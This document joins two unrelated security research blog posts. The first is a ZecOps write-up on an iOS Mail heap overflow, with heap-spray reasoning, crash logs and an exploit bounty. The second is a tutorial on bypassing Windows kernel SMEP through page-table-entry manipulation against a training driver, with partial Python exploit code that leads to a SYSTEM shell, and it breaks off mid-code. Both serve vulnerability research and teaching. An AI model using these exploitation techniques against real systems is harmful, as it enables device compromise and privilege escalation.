ZecOps encourages Apple to release an out of band patch for the recently disclosed vulnerabilities and hopes that this blog will provide additional reinforcement to release patches as early as possible. In this blogpost we will show a simple way to spray the heap, whereby we were able to prove that remote exploitation of this issue is possible, and we will also provide two examples of triggers observed in the wild.

At present, we already have the following:

  • Remote heap-overflow in Mail application
  • Ability to trigger the vulnerability remotely with attacker-controlled input through an incoming mail
  • Ability to alter code execution
  • Kernel Elevation of Privileges 0day

What we don’t have:

  • An infoleak – but therein rests a surprise: an infoleak is not mandatory to be in Mail since an infoleak in almost any other process would be sufficient. Since dyld_shared_cache is shared through most processes, an infoleak vulnerability doesn’t necessarily have to be inside MobileMail, for example CVE-2019-8646 of iMessage can do the trick remotely as well – which opens additional attack surface (Facetime, other apps, iMessage, etc). There is a great talk by 5aelo during OffensiveCon covering similar topics.

Therefore, now we have all the requirements to exploit this bug remotely. Nonetheless, we prefer to be cautious  in chaining this together because:

  • We have no intention of disclosing the LPE – it allows us to perform filesystem extraction / memory inspection on A12 devices and above when needed. You can read more about the problems of analyzing mobile devices at
  • We haven’t seen exploitation in the wild for the LPE.

We will also share two examples of triggers that we have seen in the wild and let you make your own inferences and conclusions. 

the mail-demon vulnerability
were you targeted by this vulnerability?

MailDemon Bounty

Lastly, we will present a bounty for those submissions that were able to demonstrate that they were attacked.

Exploiting MailDemon

As we previously hinted, MailDemon is a great candidate for exploitation because it overwrites small chunks of a MALLOC_NANO memory region, which stores a large number of Objective-C objects. Consequently, it allows attackers to manipulate an ISA pointer of the corrupted objects (allowing them to cause type confusions) or overwrite a function pointer to control the code flow of the process. This represents a viable approach of taking over the affected process.

Heap Spray & Heap Grooming Technique

In order to control the code flow, a heap spray is required to place crafted data into the memory. With the sprayed fake class containing a fake method cache of ‘dealloc’ method, we were able to control the Program Counter (PC) register after triggering the vulnerability using this method*.

The following is a partial crash log generated while testing our POC:

Exception Type:  EXC_BAD_ACCESS (SIGBUS)
Exception Subtype: EXC_ARM_DA_ALIGN at 0xdeadbeefdeadbeef
VM Region Info: 0xdeadbeefdeadbeef is not in any region.  Bytes after previous region: 16045690973559045872  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      MALLOC_NANO            0000000280000000-00000002a0000000 [512.0M] rw-/rwx SM=PRV  

Thread 18 name:  Dispatch queue:
Thread 18 Crashed:
0   ???                           	0xdeadbeefdeadbeef 0 + -2401053088876216593
1   libdispatch.dylib             	0x00000001b7732338 _dispatch_lane_serial_drain$VARIANT$mp  + 612
2   libdispatch.dylib             	0x00000001b7732e74 _dispatch_lane_invoke$VARIANT$mp  + 480
3   libdispatch.dylib             	0x00000001b773410c _dispatch_workloop_invoke$VARIANT$mp  + 1960
4   libdispatch.dylib             	0x00000001b773b4ac _dispatch_workloop_worker_thread  + 596
5   libsystem_pthread.dylib       	0x00000001b796a114 _pthread_wqthread  + 304
6   libsystem_pthread.dylib       	0x00000001b796ccd4 start_wqthread  + 4

Thread 18 crashed with ARM Thread State (64-bit):
    x0: 0x0000000281606300   x1: 0x00000001e4b97b04   x2: 0x0000000000000004   x3: 0x00000001b791df30
    x4: 0x00000002827e81c0   x5: 0x0000000000000000   x6: 0x0000000106e5af60   x7: 0x0000000000000940
    x8: 0x00000001f14a6f68   x9: 0x00000001e4b97b04  x10: 0x0000000110000ae0  x11: 0x000000130000001f
   x12: 0x0000000110000b10  x13: 0x000001a1f14b0141  x14: 0x00000000ef02b800  x15: 0x0000000000000057
   x16: 0x00000001f14b0140  x17: 0xdeadbeefdeadbeef  x18: 0x0000000000000000  x19: 0x0000000108e68038
   x20: 0x0000000108e68000  x21: 0x0000000108e68000  x22: 0x000000016ff3f0e0  x23: 0xa3a3a3a3a3a3a3a3
   x24: 0x0000000282721140  x25: 0x0000000108e68038  x26: 0x000000016ff3eac0  x27: 0x00000002827e8e80
   x28: 0x000000016ff3f0e0   fp: 0x000000016ff3e870   lr: 0x00000001b6f3db9c
    sp: 0x000000016ff3e400   pc: 0xdeadbeefdeadbeef cpsr: 0x60000000

The ideal primitive for heap spray in this case is a memory leak bug that can be triggered from remote, since we want the sprayed memory to stay untouched until the memory corruption is triggered. We left this as an exercise for the reader. Such primitive could qualify for up to $7,337 bounty from ZecOps (read more below).

Another way is using MFMutableData itself – when the size of MFMutableData is less than 0x20000 bytes it allocates memory from the heap instead of creating a file to store the content. And we can control the MFMutableData size by splitting content of the email into lines less than 0x20000 bytes since the IMAP library reads email content by lines. With this primitive we have a better chance to place payload into the address we want.


An oversized email is capable of reproducing the vulnerability as a PoC(see details in our previous blog), but for a stable exploit, we need to take a closer look at “-[MFMutableData appendBytes:length:]“

-[MFMutableData appendBytes:length:] 
  int old_len = [self length];
  char* bytes = self->bytes;
     bytes = [self _mapMutableData]; //Might be a data pointer of a size 8 heap
  copy_dst = bytes + old_len;
  memmove(copy_dst, append_bytes, append_length); // It used append_length to copy the memory, causing an OOB writing in a small heap

The destination address of memove is ”bytes + old_len” instead of’ ‘bytes”. So what if we accumulate too much data before triggering the vulnerability? The “old_len” would end up with a very big value so that the destination address will end up in a invalid address which is beyond the edge of this region and crash immediately, given that the size of MALLOC_NANO region is 512MB.

             |                |
   bytes --> +----------------+\
             |                | +
             |                | |
             |                | |
             |    padding     | |
             |                | |
             |                | | old_len
             |                | |
             |                | |
             |                | |
             |                | +
copy_dst --> +----------------+/
             | overflow data  |
             |                |
             |                |
             |                |
             |                |

In order to reduce the size of “padding”, we need to consume as much data as possible before triggering the vulnerability – a memory leak would be one of our candidates.

Noteworthy, the “padding” doesn’t mean the overflow address is completely random, the “padding” is predictable by hardware models since the RAM size is the same, and mmap is usually failed at the same size during our tests.

Crash analysis

This post discusses several triggers and exploitability of the MobileMail vulnerability detected in the wild which we covered in our previous blog.

Case 1 shows that the vulnerability is triggered in the wild before it was disclosed.

Case 2 is due to memory corruption in the MALLOC_NANO region, the value of the corrupted memory is part of the sent email and completely controlled by the sender.

Case 1

The following crash was triggered right inside the vulnerable function while the overflow happens. 

Coalition:  [521]

Exception Subtype: KERN_INVALID_ADDRESS at 0x000000004a35630e //[a]
VM Region Info: 0x4a35630e is not in any region.  Bytes before following region: 3091946738
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      __TEXT                 000000010280c000-0000000102aec000 [ 2944K] r-x/r-x SM=COW  ...p/MobileMail]

Thread 4 Crashed:
0   libsystem_platform.dylib      	0x00000001834a5a80 _platform_memmove  + 208
       0x1834a5a74         ldnp x10, x11, [x1, #16]       
       0x1834a5a78         add x1, x1, 0x20               
       0x1834a5a7c         sub x2, x2, x5                 
       0x1834a5a80         stp x12, x13, [x0]   //[b]          
       0x1834a5a84         stp x14, x15, [x0, #16]        
       0x1834a5a88         subs x2, x2, 0x40              
       0x1834a5a8c 0x00002ab0    

1   MIME                          	0x00000001947ae104 -[MFMutableData appendBytes:length:]  + 356
2   Message                       	0x0000000194f6ce6c -[MFDAMessageContentConsumer consumeData:length:format:mailMessage:]  + 804
3   DAEAS                         	0x000000019ac5ca8c -[ASAccount folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 736
4   DAEAS                         	0x000000019aca3fd0 -[ASFolderItemsSyncTask handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:]  + 524
5   DAEAS                         	0x000000019acae338 -[ASItem _streamYourLittleHeartOutWithContext:]  + 440
6   DAEAS                         	0x000000019acaf4d4 -[ASItem _streamIfNecessaryFromContext:]  + 96
7   DAEAS                         	0x000000019acaf758 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 164
8   DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776
9   DAEAS                         	0x000000019acaf7d8 -[ASItem _parseNextValueWithDataclass:context:root:parent:callbackDict:streamCallbackDict:parseRules:account:]  + 292
10  DAEAS                         	0x000000019acb001c -[ASItem parseASParseContext:root:parent:callbackDict:streamCallbackDict:account:]  + 776

Thread 4 crashed with ARM Thread State (64-bit):
    x0: 0x000000004a35630e   x1: 0x00000001149af432   x2: 0x0000000000001519   x3: 0x000000004a356320
    x4: 0x0000000100000028   x5: 0x0000000000000012   x6: 0x0000000c04000100   x7: 0x0000000114951a00
    x8: 0x44423d30443d3644   x9: 0x443d30443d38463d  x10: 0x3d31413d31443d30  x11: 0x31413d31463d3444
   x12: 0x33423d30453d3043  x13: 0x433d30443d35423d  x14: 0x3d30443d36443d44  x15: 0x30443d38463d4442
   x16: 0x00000001834a59b0  x17: 0x0200080110000100  x18: 0xfffffff00a0dd260  x19: 0x000000000000152b
   x20: 0x00000001149af400  x21: 0x000000004a35630e  x22: 0x000000004a35630f  x23: 0x0000000000000008
   x24: 0x000000000000152b  x25: 0x0000000000000000  x26: 0x0000000000000000  x27: 0x00000001149af400
   x28: 0x000000018dbd34bc   fp: 0x000000016da4c720   lr: 0x00000001947ae104
    sp: 0x000000016da4c720   pc: 0x00000001834a5a80 cpsr: 0x80000000

With [a] and [b] we know that the process crashed inside “memmove” called by “-[MFMutableData appendBytes:length:]”, which means the value of “copy_dst” is an invalid address at first place which is 0x4a35630e.

So where did the value of the register x0 (0x4a35630e) come from? It’s much smaller than the lowest valid address. 

Turns out that the process crashed when after failing to mmap a file and then failing to allocate the 8 byte memory at the same time. 

The invalid address 0x4a35630e is actually the offset which is the length of MFMutableData before triggering the vulnerability(i.e. “old_len”). When calloc fails to allocate the memory it returns NULL, so the copy_dst will be “0 + old_len(0x4a35630e)”. 

In this case the “old_len” is about 1.2GB which matches the average length of our POC which is likely to cause mmap failure and trigger the vulnerability.

Please note that x8-x15, and x0 are fully controlled by the sender.

The crash gives us another answer for our question above: “What if we accumulate too much data before triggering the vulnerability?” – The allocation of the 8-bytes memory could fail and crash while copying the payload to an invalid address. This can make reliable exploitation more difficult, as we may crash before taking over the program counter.

A Blast From The Past: Mysterious Trigger on iOS 3.1.3 in 2010!

Noteworthy, we found a public example of exactly a similar trigger by an anonymous user in forums:

Vulnerable version: iOS 3.1.3 on iPhone 2G
Time of crash: 22nd of October, 2010

The user “shyamsandeep”, registered on the 12th of June 2008 and last logged in on the 16th of October 2011 and had a single post in the forum, which contained this exact trigger.

This crash had r0 equal to 0x037ea000, which could be the result of the 1st vulnerability we disclosed in our previous blog which was due to ftruncate() failure. Interestingly, as we explained in the first case, it could also be a result of the allocation of 8-bytes memory failure however it is not possible to determine the exact reason since the log lacked memory regions information. Nonetheless, it is certain that there were triggers in the wild for this exploitable vulnerability since 2010.

Identifier: MobileMail
Version: ??? (???)
Code Type: ARM (Native)
Parent Process: launchd [1]

Date/Time: 2010-10-22 08:14:31.640 +0530
OS Version: iPhone OS 3.1.3 (7E18)
Report Version: 104

Exception Type: EXC_BAD_ACCESS (SIGSEGV) Exception Codes: KERN_INVALID_ADDRESS at 0x037ea000 Crashed Thread: 4
Thread 4 Crashed:
0 libSystem.B.dylib 0x33aaef3c 0x33aad000 + 7996 //memcpy + 0x294
1 MIME 0x30a822a4 0x30a7f000 + 12964 //_FastMemoryMove + 0x44
2 MIME 0x30a8231a 0x30a7f000 + 13082 // -[MFMutableData appendBytes:length:] + 0x6a
3 MIME 0x30a806d6 0x30a7f000 + 5846 // -[MFMutableData appendData:] + 0x32
4 Message 0x342e2938 0x34251000 + 596280 // -[DAMessageContentConsumer consumeData:length:format:mailMessage:] + 0x25c
5 Message 0x342e1ff8 0x34251000 + 593912 // -[DAMailAccountSyncConsumer consumeData:length:format:mailMessage:] +0x24
6 DataAccess 0x34146b22 0x3413e000 + 35618 // -[ASAccount
folderItemsSyncTask:handleStreamOperation:forCodePage:tag:withParentItem:withData:dataLength:] + 0x162
7 DataAccess 0x3416657c 0x3413e000 + 165244 //[ASFolderItemsSyncTaskhandleStreamOperation:forCodePage:tag:withParentIt em:withData:dataLength:] + 0x108

Thread 4 crashed with ARM Thread State:
r0: 0x037ea000 r1: 0x008729e0 r2: 0x00002205 r3: 0x4e414153
r4: 0x41415367 r5: 0x037e9825 r6: 0x00872200 r7: 0x007b8b78
r8: 0x0001f825 r9: 0x001fc098 r10: 0x00872200 r11: 0x0087c200
ip: 0x0000068a sp: 0x007b8b6c lr: 0x30a822ab pc: 0x33aaef3c
cpsr: 0x20000010

Case 2

Following is another crash that happened after an email was received and processed.

Coalition:  [308]

Exception Subtype: KERN_INVALID_ADDRESS at 0x0041004100410041 // [a]
VM Region Info: 0x41004100410041 is not in any region.  Bytes after previous region: 18296140473139266  
      REGION TYPE                      START - END             [ VSIZE] PRT/MAX SHRMOD  REGION DETAIL
      mapped file            00000002d31f0000-00000002d6978000 [ 55.5M] r--/rw- SM=COW  ...t_id=9bfc1855

Thread 13 name:  Dispatch queue: Internal _UICache queue
Thread 13 Crashed:
0   libobjc.A.dylib               	0x00000001b040fca0 objc_release  + 16
       0x1b040fc94         mov x29, sp                    
       0x1b040fc98         cbz x0, 0x0093fce4             
       0x1b040fc9c         tbnz x0, #63, 0x0093fce4       
       0x1b040fca0         ldr x8, [x0]            // [b]       
       0x1b040fca4         and x8, x8, 0xffffffff8        
       0x1b040fca8         ldrb w8, [x8, #32]             
       0x1b040fcac         tbz w8, #2, 0x0093fd14         

1   CoreFoundation                	0x00000001b1119408 -[__NSDictionaryM removeAllObjects]  + 600
2   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
3   libdispatch.dylib             	0x00000001b0c0bc1c _dispatch_lane_barrier_sync_invoke_and_complete  + 56    
4   UIFoundation                  	0x00000001bb9136b0 __16-[_UICache init]_block_invoke  + 76     
5   libdispatch.dylib             	0x00000001b0c5d7d4 _dispatch_client_callout  + 16
6   libdispatch.dylib             	0x00000001b0c0201c _dispatch_continuation_pop$VARIANT$mp  + 412
7   libdispatch.dylib             	0x00000001b0c11fa8 _dispatch_source_invoke$VARIANT$mp  + 1308
8   libdispatch.dylib             	0x00000001b0c0ee00 _dispatch_kevent_worker_thread  + 1224   
9   libsystem_pthread.dylib       	0x00000001b0e3e124 _pthread_wqthread  + 320          
10  libsystem_pthread.dylib       	0x00000001b0e40cd4 start_wqthread  + 4 

Thread 13 crashed with ARM Thread State (64-bit):
    x0: 0x0041004100410041   x1: 0x00000001de1ac18a   x2: 0x0000000000000000   x3: 0x0000000000000010
    x4: 0x00000001b0c60388   x5: 0x0000000000000010   x6: 0x0000000000000000   x7: 0x0000000000000000
    x8: 0x0000000281f94090   x9: 0x00000001b143f670  x10: 0x0000000142846800  x11: 0x0000004b0000007f
   x12: 0x00000001428468a0  x13: 0x000041a1eb487861  x14: 0x0000000283ed9d10  x15: 0x0000000000000004
   x16: 0x00000001eb487860  x17: 0x00000001b11191b0  x18: 0x0000000000000000  x19: 0x0000000281dce4c0
   x20: 0x0000000282693398  x21: 0x0000000282693330  x22: 0x0000000000000000  x23: 0x0000000000000000
   x24: 0x0000000281dce4c8  x25: 0x000000000c000000  x26: 0x000000000000000d  x27: 0x00000001eb48e000
   x28: 0x0000000282693330   fp: 0x000000016b8fe820   lr: 0x00000001b1119408
    sp: 0x000000016b8fe820   pc: 0x00000001b040fca0 cpsr: 0x20000000

[a]: The pointer of the object was overwritten with “0x0041004100410041” which is AAAA in unicode. 

[b] is one of the instructions around the crashed address we’ve added for better understanding, the process crashed on instruction “ldr x8, [x0]” while -[__NSDictionaryM removeAllObjects] was trying to release one the objects.

By reverse engineering -[__NSDictionaryM removeAllObjects], we understand that register x0 was loaded from x28(0x0000000282693330), since register x28 was never changed before the crash.

Let’s take a look at the virtual memory region information of x28: 0x0000000282693330, the overwritten object was stored in MALLOC_NANO region which stores small heap chunks. The heap overflow vulnerability corrupts the same region since it overflows on a 8-bytes heap chunk which is also stored in MALLOC_NANO.

  MALLOC_NANO         	 0x0000000280000000-0x00000002a0000000	 rw-/rwx

This crash is actually pretty close to controlling the PC since it controls the pointer of an Objective-C object. By pointing the value of register x0 to a memory sprayed with a fake object and class with fake method cache, the attackers could control the PC pointer, this phrack blog explains the details.


  1. It is rare to see that user-provided inputs trigger and control remote vulnerabilities. 
  2. We prove that it is possible to exploit this vulnerability using the described technique.
  3. We have observed real world triggers with a large allocation size.
  4. We have seen real world triggers with values that are controlled by the sender.
  5. The emails we looked for were missing / deleted.
  6. Success-rate can be improved. This bug had in-the-wild triggers in 2010 on an iPhone 2G device.
  7. In our opinion, based on the above, this bug is worth an out of band patch.

How Can Apple Improve the Logs?

The lack of details in iOS logs and the lack of options to choose the granularity of the data  for both individuals and organizations need to change to get iOS to be on-par with MacOS, Linux, and Windows capabilities. In general, the concept of hacking into a phone in order to analyze it, is completely flawed and should not  be the normal way to do it.

We suggest Apple improve its error diagnostics process to help individuals, organizations, and SOCs to investigate their devices. We have a few helpful technical suggestions:

  1. Crashes improvement: Enable to see memory next to each pointer / register
  2. Crashes improvement: Show stack / heap memory / memory near registers
  3. Add PIDs/PPIDs/UID/EUID to all applicable events
  4. Ability to send these logs to a remote server without physically connecting the phone – we are aware of multiple cases where the logs were mysteriously deleted
  5. Ability to perform complete digital forensics analysis of suspected iOS devices without a need to hack into the device first.

Questions for Apple

  • How many triggers have you seen to this heap overflow since iOS 3.1.3? 
  • How were you able to determine within one day that all of the triggers to this bug were not malicious and did you actually go over each event ? 
  • When are you planning to patch this vulnerability?
  • What are you going to do about enhancing forensics on mobile devices (see the list above)?

MailDemon Bounty

If you experienced any of the three symptoms below, use another mail application (e.g. Outlook for Desktop), and send the relevant emails (including the Email Source) to the address [email protected]– there are instructions at the bottom of this post.

Suspected emails may appear as follows:

Bounty details: We will validate if the email contains an exploit code. For the first two submissions containing Mail exploits that were verified by ZecOps team, we will provide:

  • $10,000 USD bounty
  • One license for ZecOps Gluon (DFIR for mobile devices) for 1 year
  • One license for ZecOps Neutrino (DFIR for endpoints and servers) for 1 year. 

We will provide an additional bounty of up to $7,337 for exploit primitive as described above.

We will determine what were the first two valid submissions according to the date they were received in our email server and if they contain an exploit code. A total of $27,337 USD in bounties and licenses of ZecOps Gluon & Neutrino. 

For suspicious submissions, we would also request device logs in order to determine other relevant information about potential attackers exploiting vulnerabilities in Mail and other vulnerabilities on the device.

Please note: Not every email that causes the symptoms above and shared with us will qualify for a bounty as there could be other bugs in MobileMail/maild – we’re only looking for ones that contain an attack.

How to send the emails using Outlook :

  1. Open Outlook from a computer and locate the relevant email
  2. Select Actions => Other Actions => View Source
  3. And send the source to [email protected]

How to send the suspicious email via Gmail:

  1. Locate and select the relevant message
  2. Click on the three dots “… “ in the menu and click on Forward as an attachment
  3. Send the email with the “.eml” attachment to [email protected]

* Please note that we haven’t published all details intentionally. This bug is still unpatched and we want to avoid further misuse of this bug

Exploit Development: Leveraging Page Table Entries for Windows Kernel Exploitation

2 May 2020 at 00:00


Taking the prerequisite knowledge from my last blog post, let’s talk about additional ways to bypass SMEP other than flipping the 20th bit of the CR4 register - or completely circumventing SMEP all together by bypassing NX in the kernel! This blog post in particular will leverage page table entry control bits to bypass these kernel mode mitigations, as well as leveraging additional vulnerabilities such as an arbitrary read to bypass page table randomization to achieve said goals.

Before We Begin

Morten Schenk of Offensive Security has done a lot of the leg work for shedding light on this topic to the public, namely at DEF CON 25 and Black Hat 2017.

Although there has been some AMAZING research on this, I have not seen much in the way of practical blog posts showcasing this technique in the wild (that is, taking an exploit start to finish leveraging this technique in a blog post). Most of the research surrounding this topic, although absolutely brilliant, only explains how these mitigation bypasses work. This led to some issues for me when I started applying this research into actual exploitation, as I only had theory to go off of.

Since I had some trouble implementing said research into a practical example, I’m writing this blog post in hopes it will aid those looking for more detail on how to leverage these mitigation bypasses in a practical manner.

This blog post is going to utilize the HackSysExtreme vulnerable kernel driver to outline bypassing SMEP and bypassing NX in the kernel. The vulnerability class will be an arbitrary read/write primitive, which can write one QWORD to kernel mode memory per IOCTL routine.

Thank you to Ashfaq of HackSysTeam for this driver!

In addition to said information, these techniques will be utilized on a Windows 10 64-bit RS1 build. This is because Windows 10 RS2 has kernel Control Flow Guard (kCFG) enabled by default, which is beyond the scope of this post. This post simply aims to show the techniques used in today’s “modern exploitation era” to bypass SMEP or NX in kernel mode memory.

Why Go to the Mountain, If You Can Bring the Mountain to You?

The adage for the title of this section, comes from Spencer Pratt’s WriteProcessMemory() white paper about bypassing DEP. This saying, or adage, is extremely applicable to the method of bypassing SMEP through PTEs.

Let’s start with some psuedo code!

# Allocating user mode code
payload = kernel32.VirtualAlloc(
    c_int(0),                         # lpAddress
    c_int(len(shellcode)),            # dwSize
    c_int(0x3000),                    # flAllocationType
    c_int(0x40)                       # flProtect


# Grabbing HalDispatchTable + 0x8 address
HalDispatchTable+0x8 = NTBASE + 0xFFFFFF

# Writing payload to HalDispatchTable + 0x8
www.What = payload
www.Where = HalDispatchTable + 0x8


# Spawning SYSTEM shell
print "[+] Enjoy the NT AUTHORITY\SYSTEM shell!!!!"
os.system("cmd.exe /K cd C:\\")

Note, the above code is syntactically incorrect, but it is there nonetheless to help us understand what is going on.

Also, before moving on, write-what-where = arbitrary memory overwrite = arbitrary write primitive.

Carrying on, the above psuedo code snippet is allocating virtual memory in user mode, via VirtualAlloc(). Then, utilizing the write-what-where vulnerability in the kernel mode driver, the shellcode’s virtual address (residing in user mode), get’s written to nt!HalDispatchTable+0x8 (residing in kernel mode), which is a very common technique to use in an arbitrary memory overwrite situation.

Please refer to my last post on how this technique works.

As it stands now, execution of this code will result in an ATTEMPTED_EXECUTE_OF_NOEXECUTE_MEMORY Bug Check. This Bug Check is indicative of SMEP kicking in.

Letting the code execute, we can see this is the case.

Here, we can clearly see our shellcode has been allocated at 0x2620000

SMEP kicks in, and we can see the offending address is that of our user mode shellcode (Arg2 of PTE contents is highlighted as well. We will circle back to this in a moment).

Recall, from a previous blog of mine, that SMEP kicks in whenever code that resides in current privilege level (CPL 3) of the CPU (CPL 3 code = user mode code) is executed in context of CPL 0 (kernel mode).

SMEP is triggered in this case, as we are attempting to access the shellcode’s virtual address in user mode from nt!HalDispatchTable+0x8, which is in kernel mode.

But HOW is SMEP implemented is the real question.

SMEP is mandated/enabled through the OS via the 20th bit of the CR4 control register.

The 20th bit in the above image refers to the 1 in the beginning of CR4 register’s value of 0x170678, meaning SMEP is enabled on this system globally.

However, SMEP is ENFORCED on a per memory page basis, via the U/S PTE control bit. This is what we are going shift our focus to in this post.

Alex Ionescu gave a talk at Infiltrate 2015 about the implementation of SMEP on a per page basis.

Citing his slides, he explains that Intel has the following to say about SMEP enforcement on a per page basis.

“Any page level marked as supervisor (U/S=0) will result in treatment as supervisor for SMEP enforcement.”

Let’s take a look at the output of !pte in WinDbg of our user mode shellcode page to make sense of all of this!

What Intel means by the their statement in Alex’s talk, is that only ONE of the paging structure table entries (a page table entry) is needed to be set to kernel, in order for SMEP to not trigger. We do not need all 4 entries to be supervisor (kernel) mode!

This is wonderful for us, from an exploit development standpoint - as this GREATLY reduces our workload (we will see why shortly)!

Let’s learn how we can leverage this new knowledge, by first examining the current PTE control bits of our shellcode page:

  1. D - The “dirty” bit has been set, meaning a write to this address has occurred (KERNELBASE!VirtualAlloc()).
  2. A - The “access” bit has been set, meaning this address has been referenced at some point.
  3. U - The “user” bit has been set here. When the memory manager unit reads in this address, it recognizes is as a user mode address. When this bit is 1, the page is user mode. When this bit is clear, the page is kernel mode.
  4. W - The “write” bit has been set here, meaning this memory page is writable.
  5. E - The “executable” bit has been set here, meaning this memory page is executable.
  6. V - The “valid” bit is set here, meaning that the PTE is a valid PTE.

Notice that most of these control bits were set with our call earlier to KERNELBASE!VirtualAlloc() in the psuedo code snippet via the function’s arguments of flAllocationType and flProtect.

Where Do We Go From Here?

Let’s shift our focus to the PTE entry from the !pte command output in the last screenshot. We can see that our entry is that of a user mode page, from the U/S bit being set. However, what if we cleared this bit out?

If the U/S bit is set to 0, the page should become a kernel mode page, based on the aforementioned information. Let’s investigate this in WinDbg.

Rebooting our machine, we reallocate our shellcode in user mode.

The above image performs the following actions:

  1. Shows our shellcode in a user mode allocation at the virtual address 0xc60000
  2. Shows the current PTE and control bits for our shellcode memory page
  3. Uses ep in WinDbg to overwrite the pointer at 0xFFFFF98000006300 (this is the address of our PTE. When dereferenced, it contains the actual PTE control bits)
  4. Clears the PTE control bit for U/S by subtracting 4 from the PTE control bit contents.

    Note, I found this to be the correct value to clear the U/S bit through trial and error.

After the U/S bit is cleared out, our exploit continues by overwriting nt!HalDispatchTable+0x8 with the pointer to our shellcode.

The exploit continues, with a call to nt!KeQueryIntervalProfile(), which in turn, calls nt!HalDispatchTable+0x8

Stepping into the call qword ptr [nt!HalDispatchTable+0x8] instruction, we have hit our shellcode address and it has been loaded into RIP!

Executing the shellcode, results in manual bypass of SMEP!

Let’s refer back to the phraseology earlier in the post that uttered:

Why go to the mountain, if you can bring the mountain to you?

Notice how we didn’t “disable” SMEP like we did a few blog posts ago with ROP. All we did this time was just play by SMEP’s rules! We didn’t go to SMEP and try to disable it, instead, we brought our shellcode to SMEP and said “treat this as you normally treat kernel mode memory.”

This is great, we know we can bypass SMEP through this method! But the question remains, how can we achieve this dynamically?

After all, we cannot just arbitrarily use WinDbg when exploiting other systems.

Calculating PTEs

The previously shown method of bypassing SMEP manually in WinDbg revolved around the fact we could dereference the PTE address of our shellcode page in memory and extract the control bits. The question now remains, can we do this dynamically without a debugger?

Our exploit not only gives us the ability to arbitrarily write, but it gives us the ability to arbitrarily read in data as well! We will be using this read primitive to our advantage.

Windows has an API for just about anything! Fetching the PTE for an associated virtual address is no different. Windows has an API called nt!MiGetPteAddress that performs a specific formula to retrieve the associated PTE of a memory page.

The above function performs the following instructions:

  1. Bitwise shifts the contents of the RCX register to the right by 9 bits
  2. Moves the value of 0x7FFFFFFFF8 into RAX
  3. Bitwise AND’s the values of RCX and RAX together
  4. Moves the value of 0xFFFFFE0000000000 into RAX
  5. Adds the values of RAX and RCX
  6. Performs a return out of the function

Let’s take a second to break this down by importance. First things first, the number 0xFFFFFE0000000000 looks like it could potentially be important - as it resembles a 64-bit virtual memory address.

Turns out, this is important. This number is actually a memory address, and it is the base address of all of the PTEs! Let’s talk about the base of the PTEs for a second and its significance.

Rebooting the machine and disassembling the function again, we notice something.

0xFFFFFE0000000000 has now changed to 0xFFFF800000000000. The base of the PTEs has changed, it seems.

This is due to page table randomization, a mitigation of Windows 10. Microsoft definitely had the right idea to implement this mitigation, but it is not much of a use to be honest if the attacker already has an abitrary read primitive.

An attacker needs an arbitrary read primitive in the first place to extract the contents of the PTE control bits by dereferencing the PTE of a given memory page.

If an attacker already has this ability, the adversary could just use the same primitive to read in nt!MiGetPteAddress+0x13, which, when dereferenced, contains the base of the PTEs.

Again, not ripping on Microsoft - I think they honestly have some of the best default OS exploit mitigations in the business. Just something I thought of.

The method of reusing an arbitrary read primitive is actually what we are going to do here! But before we do, let’s talk about the PTE formula one last time.

As we saw, a bitwise shift right operation is performed on the contents of the RCX register. That is because when this function is called, the virtual address for the PTE you would like to fetch gets loaded into RCX.

We can mimic this same behavior in Python also!

# Bitwise shift shellcode virtual address to the right 9 bits
shellcode_pte = shellcode_virtual_address >> 9

# Bitwise AND the bitwise shifted right shellcode virtual address with 0x7ffffffff8
shellcode_pte &= 0x7ffffffff8

# Add the base of the PTEs to the above value (which will need to be previously extracted with an arbitrary read)
shellcode_pte += base_of_ptes

The variable shellcode_pte will now contain the PTE for our shellcode page! We can demonstrate this behavior in WinDbg.

Sorry for the poor screenshot above in advance.

But as we can see, our version of the formula works - and we know can now dynamically fetch a PTE address! The only question remains, how do we dynamically dereference nt!MiGetPteAddress+0x13 with an arbitrary read?

Read, Read, Read!

To use our arbitrary read, we are actually going to use our arbitrary write!

Our write-what-where primitive allows us to write a pointer (the what) to a pointer (the where). The school of thought here, is to write the address of nt!MiGetPteAddress+0x13 (the what) to a c_void_p() data type, which is Python’s representation of a C void pointer.

What will happen here is the following:

  1. Since the write portion of the write-what-where writes a POINTER (a.k.a the write will take a memory address and dereference it - which results in extracting the contents of a pointer), we will write the value of nt!MiGetPteAddress+0x13 somewhere we control. The write primitive will extract what nt!MiGetPteAddress+0x13 points to, which is the base of the PTEs, and write it somewhere we can fetch the result!
  2. The “where” value in the write-what-were vulnerability will write the “what” value (base of the PTEs) to a pointer (a.k.a if the “what” value (base of the PTEs) gets written to 0xFFFFFFFFFFFFFFFF, that means 0xFFFFFFFFFFFFFFFF will now POINT to the “what” value, which is the base of the PTEs).

The thought process here is, if we write the base of the PTEs to OUR OWN pointer that we create - we can then dereference our pointer and extract the contents ourselves!

Here is how this all looks in Python!

First, we declare a structure (one member for the “what” value, one member for the “where” value)

# Fist structure, for obtaining nt!MiGetPteAddress+0x13 value
class WriteWhatWhere_PTE_Base(Structure):
    _fields_ = [
        ("What_PTE_Base", c_void_p),
        ("Where_PTE_Base", c_void_p)

Secondly, we fetch the memory address of nt!MiGetPteAddress+0x13

Note - your offset from the kernel base to this function may be different!

# Retrieving nt!MiGetPteAddress (Windows 10 RS1 offset)
nt_mi_get_pte_address = kernel_address + 0x51214

# Base of PTEs is located at nt!MiGetPteAddress + 0x13
pte_base = nt_mi_get_pte_address + 0x13

Thirdly, we declare a c_void_p() to store the value pointed to by nt!MiGetPteAddress+0x13

# Creating a pointer in which the contents of nt!MiGetPteAddress+0x13 will be stored in to
# Base of the PTEs are stored here
base_of_ptes_pointer = c_void_p()

Fourthly, we initialize our structure with our “what” value and our “where” value which writes what the actual address of nt!MiGetPteAddress+0x13 points to (the base of the PTEs) into our declared pointer.

# Write-what-where structure #1
www_pte_base = WriteWhatWhere_PTE_Base()
www_pte_base.What_PTE_Base = pte_base
www_pte_base.Where_PTE_Base = addressof(base_of_ptes_pointer)
www_pte_pointer = pointer(www_pte_base)

